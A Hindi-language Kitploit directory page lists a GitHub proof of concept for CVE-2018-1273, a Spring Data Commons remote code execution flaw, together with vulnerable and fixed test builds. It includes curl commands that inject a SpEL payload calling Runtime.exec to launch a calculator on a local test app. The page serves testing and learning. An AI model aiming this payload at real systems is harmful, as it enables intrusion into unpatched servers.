Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/hdgokani/cve-2018-1273
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubhdgokani/cve-2018-1273

CVE-2018-1273

CVE-2018-1273 के लिए PoC: REST एंडपॉइंट्स के विरुद्ध क्राफ्टेड अनुरोध पैरामीटर के माध्यम से Spring Data Commons प्रॉपर्टी बाइंडर RCE। परीक्षण के लिए कमजोर और पैच किए गए संस्करण शामिल हैं।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-1273

Spring Data Commons, संस्करण 1.13 से 1.13.10, 2.0 से 2.0.5, और पुराने असमर्थित संस्करणों में विशेष तत्वों के अनुचित निष्प्रभावीकरण के कारण उत्पन्न होने वाली एक प्रॉपर्टी बाइंडर भेद्यता मौजूद है। एक अनधिकृत दूरस्थ दुर्भावनापूर्ण उपयोगकर्ता (या हमलावर) Spring Data REST समर्थित HTTP संसाधनों के विरुद्ध विशेष रूप से तैयार किए गए अनुरोध पैरामीटर प्रदान कर सकता है, या Spring Data की प्रोजेक्शन-आधारित अनुरोध पेलोड बाइंडिंग का उपयोग कर सकता है, जिससे दूरस्थ कोड निष्पादन हमला हो सकता है।

अधिक जानकारी यहाँ

चलाना

एप्लिकेशन को Spring Data Commons के कमजोर संस्करण या फिक्स्ड संस्करण के साथ परीक्षण किया जा सकता है।

  • कमजोर संस्करण (डिफ़ॉल्ट रूप से):
root@kitploit:~
mvn spring-boot:run
  • फिक्स्ड संस्करण:
root@kitploit:~
mvn spring-boot:run -Dfixed

भेद्यता का परीक्षण

यह जांचने के लिए निम्न कमांड चलाएँ कि क्या भेद्यता का शोषण किया जा सकता है:

  • विंडोज़ पर:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

  • मैकओएस पर:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"

श्रेय

द्वारा निर्मित: https://www.arima.eu

ARIMA Software Design

टूल डाउनलोड करें